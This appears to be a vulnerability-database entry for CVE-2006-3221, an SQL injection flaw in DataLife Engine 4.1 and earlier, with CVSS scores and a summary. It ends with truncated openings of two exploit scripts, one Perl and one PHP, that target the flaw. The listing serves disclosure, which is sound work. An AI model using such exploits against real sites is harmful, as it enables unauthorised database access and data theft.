7.5
CVSSv2

CVE-2006-3221

Published: 24/06/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in DataLife Engine 4.1 and previous versions allows remote malicious users to execute arbitrary SQL commands via double-encoded values in the user parameter in a userinfo subaction.

Vulnerable Product Search on Vulmon Subscribe to Product

softnews media group datalife engine

Exploits

#!/usr/bin/perl ## DataLife Engine sql injection exploit by RST/GHC ## (c)oded by 1dtw0lf ## RST/GHC ## rstvoidru ## ghcru ## 180606 use LWP::UserAgent; use Getopt::Std; getopts('u:n:p:'); $url = $opt_u; $name = $opt_n; $prefix = $opt_p || 'dle_'; if(!$url || !$name) { &usage; } $s_num = 1; $|++; $n = 0; &head; pr ...
<?php error_reporting (E_ERROR); ini_set("max_execution_time",0); echo ' +========================================+ | RST/GHC Datalife SQL injection exploit | +========================================+ < > Lite Version for DLE <=41 < > '; if ($argc < 2 ){ print " Usage: " $argv[0] " <host> <user> [tab ...